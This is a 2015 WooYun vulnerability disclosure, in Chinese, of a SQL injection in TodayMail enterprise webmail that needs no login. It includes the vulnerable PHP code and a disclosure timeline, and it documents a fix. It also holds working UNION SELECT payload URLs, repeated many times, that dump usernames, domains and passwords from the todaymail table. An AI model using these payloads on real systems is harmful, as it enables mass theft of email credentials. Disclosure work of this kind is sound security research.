缺陷编号:WooYun-2015-0125196
漏洞标题:TodayMail某处无需登陆的SQL注入可轻松导致大量企业邮箱帐号被脱裤
相关厂商:cncert国家互联网应急中心
漏洞作者:xfkxfk
提交时间:2015-07-09 17:15
公开时间:2015-10-08 16:42
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-13: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开
TodayMail某处无需登陆的SQL注入可轻松导致大量企业邮箱帐号被脱裤
TodayMail,时代企业邮,简介如下:http://**.**.**.**/email/**.**.**.**搜索关键字:时代企业邮案例很多,就不截图了文件searchAddr.inc.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
<?<br> header('Content-Type:text/xml;charset=UTF-8');<br> include_once "../config/dbremote.inc.php";<br> include_once "../../core/emailcore.class.inc.php";$value=trim($_REQUEST['value']);<br> $tm_id=trim($_REQUEST['ftm_id']);<br> $EmailCore = new EmailCore($tm_id);<br> $addrList=$EmailCore->searchAddrAllByKeyword($value);<br> $str="<?xml version=\"1.0\" encoding=\"UTF-8\"?><properties><property>";<br> $str.="<num>".count($addrList)."</num>";<br> for($i=0;$i<count($addrList);$i++){<br> $str.="<name".$i.">".$addrList[$i]['name']."</name".$i.">";<br> $str.="<email".$i.">".$addrList[$i]['email']."</email".$i.">";<br> }<br> $str.="</property></properties>";<br> echo $str;<br> ?> |
第一:可以看到这里没有包含登录验证的文件,所以可以无需登录即可直接访问然后$value=trim($_REQUEST['value']);接着$addrList=$EmailCore->searchAddrAllByKeyword($value);跟进函数searchAddrAllByKeyword,文件emailcore.class.inc.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
function searchAddrAllByKeyword($value){<br> //global $db_remote;<br> $addrArray=array();<br> $sql="select name,email from address where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";<br> $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());<br> while($array=mysql_fetch_assoc($rs)){<br> $addrArray[]=$array;<br> }<br> $sql="select tm_name as name,tm_domain as email from todaymail where tm_domain='".$this->EmailInfo['tm_domain']."' and (tm_name like '%$value%' or tm_domain like '%$value%') and tm_status in (1,3) and tm_level <> '1' order by tm_name asc";<br> // echo $sql;<br> $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());<br> while($array=mysql_fetch_assoc($rs)){<br> $array['email']=$array['name']."@".$array['email'];<br> $addrArray[]=$array;<br> }<br> $sql="select name,email from mailcard where ftm_id='".$this->TMID."' and (name like '%$value%' or email like '%$value%')";<br> $rs=@$this->mysql->query($sql,$this->db_remote) or die($sql.mysql_error());<br> while($array=mysql_fetch_assoc($rs)){<br> $addrArray[]=$array;<br> }<br> return $addrArray;<br> } |
清楚的看到变量$value直接进入select sql语句了,没有进行任何过滤处理,导致SQL注入漏洞产生。。。这里是没有登录的直接拿到数据可惜的是没有拿到服务器权限,而且通过域名看到,这里存在大量的企业。以官网为例吧:
1 |
http://**.**.**.**//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,%27@@@%27,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 |
通过这里的tm_domain域名字段,可以看到存在4000个域名
去重也存在3000多个域名,意味着有3000多个企业咯
以官网为例吧:
1 |
http://**.**.**.**//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 |
这里读取了1000个用户的用户名,域名,密码
再随便给几个例子:
1 2 3 4 5 6 7 8 9 10 |
http://**.**.**.**//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361<br> http://**.**.**.**//webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361<br> http://**.**.**.**/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361<br> http://**.**.**.**/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361<br> http://**.**.**.**/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361<br> http://**.**.**.**/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361<br> http://**.**.**.**/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361<br> http://**.**.**.**/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361<br> http://**.**.**.**/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361<br> http://**.**.**.**/webmail/main/searchAddr.inc.php?value=123%%27)%20union%20select%20concat(tm_name,0x23,tm_domain),tm_passwd%20from%20todaymail%20limit%200,1000%23&ftm_id=103361 |
而且数据库很多,邮件内容等都会泄漏的。用户量很大,应该是高危漏洞,很多企业的邮箱系统基本上都会沦陷。
包含登录验证文件,过滤
危害等级:高
漏洞Rank:12
确认时间:2015-07-1016:40
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。
暂无
原文连接
的情况下转载,若非则不得使用我方内容。